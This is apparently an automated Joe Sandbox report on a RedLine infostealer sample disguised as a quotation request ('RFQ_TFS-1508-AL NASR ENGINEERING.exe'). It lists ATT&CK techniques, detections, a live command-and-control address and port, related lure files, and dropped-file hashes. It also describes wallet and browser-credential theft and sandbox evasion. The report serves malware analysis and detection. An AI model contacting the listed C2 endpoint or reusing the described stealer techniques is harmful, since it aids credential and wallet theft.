                    Application Window Discovery                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Timestomp                    		Cached Domain Credentials113
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557873 Sample: RFQ_TFS-1508-AL NASR ENGINE... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 25 api.ip.sb 2->25 29 Suricata IDS alerts for network traffic 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 11 other signatures 2->35 8 RFQ_TFS-1508-AL NASR ENGINEERING.exe 1 3 2->8         started        signatures3 process4 signatures5 37 Found many strings related to Crypto-Wallets (likely being stolen) 8->37 39 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->39 41 Writes to foreign memory regions 8->41 43 4 other signatures 8->43 11 CasPol.exe 15 52 8->11         started        15 powershell.exe 23 8->15         started        17 WerFault.exe 19 16 8->17         started        19 2 other processes 8->19 process6 dnsIp7 27 193.70.111.186, 13484, 49704, 49714 OVHFR France 11->27 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->45 47 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 11->47 49 Tries to harvest and steal browser information (history, passwords, etc) 11->49 51 Tries to steal Crypto Currency Wallets 11->51 21 conhost.exe 11->21         started        53 Loading BitLocker PowerShell Module 15->53 23 conhost.exe 15->23         started        signatures8 process9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    RFQ_TFS-1508-AL NASR ENGINEERING.exe49%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                    RFQ_TFS-1508-AL NASR ENGINEERING.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://193.70.111.186:13484t-0%Avira URL Cloudsafe
                    193.70.111.186:134840%Avira URL Cloudsafe
                    http://193.70.111.186:134840%Avira URL Cloudsafe
                    http://193.70.111.186:13484/0%Avira URL Cloudsafe
                    http://193.70.111.186:13484pE0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      193.70.111.186:13484true
                      • Avira URL Cloud: safe
                      		unknown
                      http://193.70.111.186:13484/true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtabCasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                          		high
                          https://duckduckgo.com/ac/?q=CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoCasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/Endpoint/CheckConnectResponseCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.datacontract.org/2004/07/CasPol.exe, 00000005.00000002.2221153349.0000000002C3A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://193.70.111.186:13484CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Endpoint/EnvironmentSettingsCasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.ip.sbCasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.ip.sb/geoipCasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/soap/envelope/CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                                                  		high
                                                  http://tempuri.org/CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://upx.sf.netAmcache.hve.10.drfalse
                                                      		high
                                                      http://tempuri.org/Endpoint/CheckConnectCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                                                          		high
                                                          http://193.70.111.186:13484t-CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.ecosia.org/newtab/CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                                                            		high
                                                            http://tempuri.org/Endpoint/VerifyUpdateResponseCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://tempuri.org/Endpoint/SetEnvironmentCasPol.exe, 00000005.00000002.2221153349.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://tempuri.org/Endpoint/SetEnvironmentResponseCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Endpoint/GetUpdatesCasPol.exe, 00000005.00000002.2221153349.0000000002C5B000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                                                                      		high
                                                                      https://api.ipify.orgcookies//settinString.RemovegRFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Endpoint/GetUpdatesResponseCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                                                                              		high
                                                                              http://tempuri.org/Endpoint/EnvironmentSettingsResponseCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Endpoint/VerifyUpdateCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://193.70.111.186:13484pECasPol.exe, 00000005.00000002.2221153349.0000000002B2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/0CasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/soap/actor/nextCasPol.exe, 00000005.00000002.2221153349.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          193.70.111.186
                                                                                          		unknownFrance
                                                                                          		16276OVHFRtrue

                                                                                          General Information

                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1557873
                                                                                          Start date and time:2024-11-18 17:33:05 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 32s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:14
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:RFQ_TFS-1508-AL NASR ENGINEERING.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@12/55@1/1
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 50%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 80%
                                                                                          • Number of executed functions: 100
                                                                                          • Number of non-executed functions: 1
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31, 20.42.65.92
                                                                                          • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target RFQ_TFS-1508-AL NASR ENGINEERING.exe, PID 5276 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: RFQ_TFS-1508-AL NASR ENGINEERING.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          11:33:59API Interceptor23x Sleep call for process: powershell.exe modified
                                                                                          11:34:09API Interceptor38x Sleep call for process: CasPol.exe modified
                                                                                          11:34:23API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          193.70.111.186Preventivo#09678.exeGet hashmaliciousRedLineBrowse
                                                                                          • 193.70.111.186:13484/
                                                                                          QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                          • 193.70.111.186:13484/
                                                                                          RFQ_TFS-1508-AL NASR ENGINEERING.exeGet hashmaliciousRedLineBrowse
                                                                                          • 193.70.111.186:13484/
                                                                                          QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                          • 193.70.111.186:13484/
                                                                                          COTIZACI#U00d3N#09678.exeGet hashmaliciousRedLineBrowse
                                                                                          • 193.70.111.186:13484/

                                                                                          Domains

                                                                                          No context

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          OVHFRhttps://t.co/D4HGMmKLnLGet hashmaliciousUnknownBrowse
                                                                                          • 51.222.206.130
                                                                                          bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                                                          • 147.135.31.134
                                                                                          NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                          • 54.36.99.69
                                                                                          63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                          • 51.178.131.200
                                                                                          ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                          • 87.98.242.239
                                                                                          63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                          • 94.23.150.210
                                                                                          I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msgGet hashmaliciousMint StealerBrowse
                                                                                          • 51.91.79.17
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 51.195.88.199
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 51.195.88.199
                                                                                          http://pumpfun.board-sol.com/Get hashmaliciousUnknownBrowse
                                                                                          • 51.75.198.221

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RFQ_TFS-1508-AL _5b9ed2f4b716eba5ce879ab6e10a0499122638a_7b153501_3805f8aa-0467-4fc7-bfb4-1a349cea6a26\Report.wer

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):65536
                                                                                          Entropy (8bit):1.2268748978522397
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:HS+Y6KFu0UnUlaWz3OlTwd/PPdzuiFwZ24lO8Wr:y+YvFVUnUla4ouHVzuiFwY4lO8W
                                                                                          MD5:B6F20C045459E542ED787E4662D91E3A
                                                                                          SHA1:D5A746AB8631F23DA0AA643AE827E645948AF301
                                                                                          SHA-256:37B1A32D70C83D359A6F1BB989471BEC13A260F94A8D4F1EC9B20CC0EB1A64FA
                                                                                          SHA-512:F0C3697576AE3EE804EE383FCCCE093096B2CCEBAE3E932128E93A94383283C2BBF3E576DC2354B16CA7DA8E914C2BF327E0BF446D4156330FD67AAA6F661C77
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.4.2.1.2.3.9.8.8.1.9.9.3.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.4.2.1.2.4.1.5.5.3.8.7.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.0.5.f.8.a.a.-.0.4.6.7.-.4.f.c.7.-.b.f.b.4.-.1.a.3.4.9.c.e.a.6.a.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.f.6.8.2.f.1.-.1.b.4.d.-.4.b.a.7.-.b.0.5.2.-.4.4.c.f.9.f.e.a.e.c.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.R.F.Q._.T.F.S.-.1.5.0.8.-.A.L. .N.A.S.R. .E.N.G.I.N.E.E.R.I.N.G...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.u.r.e.n.s.o.h.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.9.c.-.0.0.0.1.-.0.0.1.4.-.3.8.5.a.-.1.f.a.9.d.7.3.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.1.6.e.4.5.5.7.2.8.c.c.a.8.9.7.b.0.8.b.6.0.8.6.1.1.8.4.9.9.5.0.0.0.0.0.0.0.0.!.0.0.0.0.d.5.4.5.0.d.3.2.5.9.d.f.0.8.a.3.d.0.c.0.a.0.b.9.1.b.5.8.

                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER21E4.tmp.dmp

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:Mini DuMP crash report, 16 streams, Mon Nov 18 16:34:00 2024, 0x1205a4 type
                                                                                          Category:dropped
                                                                                          Size (bytes):491999
                                                                                          Entropy (8bit):3.3111202052524322
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:GYpPNSfnQ4YWB8YtBq5Y3QgxHEvnB6t+:G2ctBq5MQgxHEvn
                                                                                          MD5:D10AC1C2B3295EC2945D20424F83F35F
                                                                                          SHA1:5AB46F133242AACD71ED775B6F5E2F1D76B1E00C
                                                                                          SHA-256:F0CFE847B6D799A6ECAB35517CA3CEF8BAA90D0613448D849BBDA8A8DDE173A5
                                                                                          SHA-512:C62F075186817129E47826CD5C319D2249F25A541F4DDDB18D556883B39BD9F888298B55284BAF3528FFAF7F3A4CF255BFFACF65BB58D993522A5C36CD8D3409
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:MDMP..a..... .......xl;g............t.......................$...H&..........l&.......O..b...........l.......8...........T............8...I..........\D..........HF..............................................................................eJ.......F......Lw......................T...........sl;g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2744.tmp.WERInternalMetadata.xml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8688
                                                                                          Entropy (8bit):3.7213208429869393
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:R6l7wVeJKnc6YEIOjhwgmf9h4Ppr389b+Hx1If2qm:R6lXJSc6YExjhwgmf9h4K+Hxafy
                                                                                          MD5:E4F96DA801C28EE80BFB6C1D1DB4820E
                                                                                          SHA1:396EA529E400DD4BBB4EC71C10692A2070287D41
                                                                                          SHA-256:30F303544F61B63FFBF18FB52520F5E3970F5F73BB6C95553FE0DC9E03E346F1
                                                                                          SHA-512:48003FA1B133220F55F21C3F104045B4C59685F690EDC5B31BAE5892AF055C405B2F415A238CF6354CD535DD276D7671FB6EFA240C48C55377CC173BC8AFB03A
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.7.6.<./.P.i.

                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2793.tmp.xml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4867
                                                                                          Entropy (8bit):4.608652788918635
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cvIwWl8zsbJg771I9f4nWpW8VYlBYm8M4JM6sL+FUyq85wyssJvRwRad:uIjf1I74F7V3J68J5Wad
                                                                                          MD5:431D0F5AA385D60F65C9FC4392CCF50A
                                                                                          SHA1:2CA8071B3AB1D4DF60BBF99FFBF15E337A0690F7
                                                                                          SHA-256:CADDF717A855F7260DD534A3A2222C8143FBBA372CB844D367015DE6FF51F33C
                                                                                          SHA-512:FC93B80076DBC6447E9C4E672C0886AA672A6EA0111DF5AFBCE9AC9BC20EBA8E3D1409295F2C065A05B1C26681C8D01564687073C5A8D1536D336B40B0BEEA73
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="593736" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

